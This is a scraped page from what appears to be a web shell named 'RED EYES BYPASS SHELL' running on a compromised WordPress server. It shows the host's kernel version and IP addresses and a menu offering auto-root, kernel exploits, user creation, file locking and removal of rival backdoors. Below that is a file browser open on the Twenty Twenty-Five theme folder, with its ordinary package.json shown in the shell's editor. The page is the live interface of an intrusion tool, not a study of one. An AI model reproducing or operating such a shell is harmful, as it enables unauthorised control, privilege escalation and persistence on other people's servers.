Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
twentytwentyfive /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
parts
[ DIR ]
drwxr-xr-x
patterns
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
contributing.txt
1.24
KB
-rwxr-xr-x
functions.php
4.32
KB
-rwxr-xr-x
package-lock.json
52.91
KB
-rwxr-xr-x
package.json
776
B
-rwxr-xr-x
readme.txt
8.85
KB
-rwxr-xr-x
screenshot.png
211.6
KB
-rwxr-xr-x
style.css
2.94
KB
-rwxr-xr-x
style.min.css
611
B
-rwxr-xr-x
theme.json
14.51
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "twentytwentyfive", "version": "1.4.0", "description": "Default WP Theme", "author": "The WordPress Contributors", "license": "GPL-2.0-or-later", "keywords": [ "WordPress", "Theme" ], "bugs": { "url": "https://core.trac.wordpress.org/" }, "homepage": "https://wordpress.org/themes/twentytwentyfive/", "engines": { "node": ">=20.10.0", "npm": ">=10.2.3" }, "devDependencies": { "@wordpress/browserslist-config": "^6.34.0", "postcss": "^8.5.6", "postcss-cli": "^11.0.1", "cssnano": "^7.1.2" }, "browserslist": [ "extends @wordpress/browserslist-config" ], "scripts": { "build": "postcss style.css --use cssnano -o style.min.css --no-map", "watch": "postcss style.css --use cssnano -o style.min.css --no-map --watch" } }
Close